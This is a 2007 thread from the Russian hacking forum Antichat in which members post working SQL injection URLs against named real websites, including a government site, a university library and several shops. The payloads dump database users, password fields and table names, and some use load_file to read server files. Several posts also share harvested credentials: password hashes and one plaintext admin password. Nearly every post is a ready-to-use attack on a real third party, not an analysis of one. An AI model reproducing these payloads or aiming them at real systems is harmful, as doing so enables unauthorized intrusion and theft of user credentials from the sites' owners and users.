ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2751  
Старый 21.07.2007, 01:53
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

hттp://www.bluerunventures.com/news_releases.php?nid=-156+union+select+1,2,3,User,Password,user(),7+from +mysql.user/*
pwruser
396bcbca6cf1b3cf

hттp://nam.kiev.ua/kaf/showkaf.php?K=-1+union+select+1,version(),database(),user(),5+/*
hттp://jaguar.com.ua/?navid=1'

не мое.. просто весело что давно уже
hттp://www.president.gov.ge/?l=E&m=0&sm=1&st=0&id=-2269+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
 
Ответить с цитированием

  #2752  
Старый 21.07.2007, 02:59
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://partytown.ru/music.php?id=-59+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+cinema__user/*
Код:
http://www.thepalestra.com/music.php?id=-3171+union+select+1,login,id,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users+limit+3570,1/*

Последний раз редактировалось SWAT; 21.07.2007 в 03:17..
 
Ответить с цитированием

  #2753  
Старый 21.07.2007, 12:32
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
http://library2.fairfield.edu/dblist.php?s=-1+union+select+1,2,3,4,5,concat_ws(0x3a,USER(),DAT ABASE(),VERSION())
read@localhost:library:4.0.20
 
Ответить с цитированием

  #2754  
Старый 21.07.2007, 15:33
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.treyporter.com/ylt/music.php?id=-5+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+21,1/*
Код:
http://omahanightlife.com/thearts-music.php?p=view&id=-220+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+limit+57,1/*

Последний раз редактировалось SWAT; 21.07.2007 в 15:55..
 
Ответить с цитированием

  #2755  
Старый 21.07.2007, 20:05
Аватар для Sn@k3
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

http://www.stavki.info/index.php?page=forum&part=1&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())/*

случайно ткнул,.. странно... не могу найти имя таблицы =\
 
Ответить с цитированием

  #2756  
Старый 21.07.2007, 23:15
Аватар для Sn@k3
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

http://www.uprava.org/section.php?id=-1+union+select+1,0x536e406b3320e2e8e4e8f220e2e0f12 e20cbeeec20efeee4e1e8f0e0f220f2e0e1ebe8f6f3,3,4,5, 6,7/*
 
Ответить с цитированием

  #2757  
Старый 22.07.2007, 00:22
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Нашел багу в древнем модуле для PHP_Nuke
Код:
http://www.english4u.dp.ua/modules.php?name=Literature&op=Open&id=-1+union+select+1,2,3,4,5,6,user_password,8,9+from+nuke_users+where+username=0x446d69747279/*
хэш админа.
в админке привязка к айпи.

ах да, забыл, пасс 'dima'

Последний раз редактировалось n1†R0x; 22.07.2007 в 00:26..
 
Ответить с цитированием

  #2758  
Старый 22.07.2007, 01:46
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.myshopasia.com/product_display.php?category_cd=-27+union+select+1,2,3,4,5/*
Код:
http://www.wi2wi.com/news_releases.php?nid=-135+union+select+1,2,3,user,User(),6,7+from+mysql.user/*
Код:
http://www.wnypolonia.com/directory/listings.php?catid=-16+union+select+1,VERSION(),3,4/*
Код:
http://www.mountainx.com/greenbuilding/listings.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,VERSION(),13,14,15,16,17/*
Код:
http://www.sputnik-video.ru/catalog.php?id=-58+union+select+1,2,3,login,pass,6,7,8+from+users/*

Последний раз редактировалось SWAT; 22.07.2007 в 14:53..
 
Ответить с цитированием

  #2759  
Старый 22.07.2007, 21:40
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

/home/amandamc/public_html/lilly/pages/set.php
Код:
http://www.lilyandlotus.com/pages/set.php?id=324+union+select+1,2,user(),4,5/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #2760  
Старый 22.07.2007, 22:24
Аватар для Shram-spb
Shram-spb
Познающий
Регистрация: 06.06.2007
Сообщений: 83
Провел на форуме:
404154

Репутация: 140
Отправить сообщение для Shram-spb с помощью ICQ
По умолчанию

Код:
http://www.nelson.wisc.edu/dir/profile.php?id=-1+union+select+1,21,3,4,load_file(char(47,118,97,114,47,119,119,119,47,110,101,108,115,111,110,47,105,110,100,101,120,46,112,104,112)),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,32,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,31,4,5,6,7,8,9,0,1,2,3,4
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ